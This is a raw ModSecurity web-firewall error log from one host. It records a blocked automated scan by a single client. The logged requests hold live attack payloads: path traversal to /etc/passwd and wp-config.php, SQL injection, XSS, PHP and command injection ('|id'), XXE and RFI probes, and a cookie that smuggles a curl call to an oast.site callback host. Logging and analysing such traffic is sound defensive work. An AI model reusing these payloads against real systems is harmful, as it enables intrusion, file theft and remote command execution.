[Tue Aug 29 11:41:13.367849 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO126cCo-f0AAAcqJJ4AAAAG"]
[Tue Aug 29 11:41:16.458724 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO127MCo-f0AAAYf-QUAAAAD"]
[Tue Aug 29 11:41:18.399665 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO127sCo-f0AAAcbSDwAAAAv"]
[Tue Aug 29 11:41:18.470685 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/"] [unique_id "ZO127sCo-f0AAAcqJLwAAAAG"]
[Tue Aug 29 11:41:19.371523 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO1278Co-f0AAActbLYAAAAH"]
[Tue Aug 29 11:41:19.382848 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO1278Co-f0AAAc4EmQAAAAP"]
[Tue Aug 29 11:41:19.485054 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO1278Co-f0AAAc0NccAAAAM"]
[Tue Aug 29 11:41:20.666331 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128MCo-f0AAAc0NdcAAAAM"]
[Tue Aug 29 11:41:20.715568 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128MCo-f0AAAcqJM4AAAAG"]
[Tue Aug 29 11:41:20.715722 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128MCo-f0AAAc4EnEAAAAP"]
[Tue Aug 29 11:41:20.766728 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128MCo-f0AAAaZ9rYAAAAo"]
[Tue Aug 29 11:41:22.007045 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26gy1npiqg3roewh.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128sCo-f0AAAaZ9r8AAAAo"]
[Tue Aug 29 11:41:23.365754 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO1288Co-f0AAAcoNVkAAAAF"]
[Tue Aug 29 11:41:23.431433 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO1288Co-f0AAAcbSEwAAAAv"]
[Tue Aug 29 11:41:24.448152 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:pattern. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:pattern: <svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/config/postProcessing/testNaming"] [unique_id "ZO129MCo-f0AAAcbSFEAAAAv"]
[Tue Aug 29 11:41:24.558729 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO129MCo-f0AAAc2dSEAAAAN"]
[Tue Aug 29 11:41:25.359581 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAQkBcQAAAAC"]
[Tue Aug 29 11:41:25.472020 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAQkBcgAAAAC"]
[Tue Aug 29 11:41:25.564287 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO129cCo-f0AAAc2dSwAAAAN"]
[Tue Aug 29 11:41:26.385168 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO129sCo-f0AAAc0NgUAAAAM"]
[Tue Aug 29 11:41:26.585370 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAc0NgkAAAAM"]
[Tue Aug 29 11:41:26.636118 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO129sCo-f0AAAcbSGcAAAAv"]
[Tue Aug 29 11:41:27.579235 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ajax_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO1298Co-f0AAAcrijYAAAAB"]
[Tue Aug 29 11:41:28.360657 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g3ff7xu3kqr1rp.oast.site found within TX:1: cjmnbitjmimt14dgn26g3ff7xu3kqr1rp.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/Umbraco/feedproxy.aspx"] [unique_id "ZO12@MCo-f0AAAUKhG4AAABC"]
[Tue Aug 29 11:41:30.381057 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at REQUEST_COOKIES:Cacti. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within REQUEST_COOKIES:Cacti: ;curl http://cjmnbitjmimt14dgn26giksfusadcddw8.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/graph_realtime.php"] [unique_id "ZO12@sCo-f0AAAcqJOYAAAAG"]
[Tue Aug 29 11:41:30.676836 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@sCo-f0AAAc0NhoAAAAM"]
[Tue Aug 29 11:41:32.415087 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-MCo-f0AAAcrik8AAAAB"]
[Tue Aug 29 11:41:32.558926 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-MCo-f0AAAbo-aAAAAAi"]
[Tue Aug 29 11:41:33.472588 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-cCo-f0AAAc0NioAAAAM"]
[Tue Aug 29 11:41:35.536258 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO12-8Co-f0AAAXHqC0AAAAT"]
[Tue Aug 29 11:41:36.513171 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AMCo-f0AAAcoNaIAAAAF"]
[Tue Aug 29 11:41:36.602835 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AMCo-f0AAAc0NjgAAAAM"]
[Tue Aug 29 11:41:38.392686 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13AsCo-f0AAAcbSLAAAAAv"]
[Tue Aug 29 11:41:39.374189 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13A8Co-f0AAAXHqEEAAAAT"]
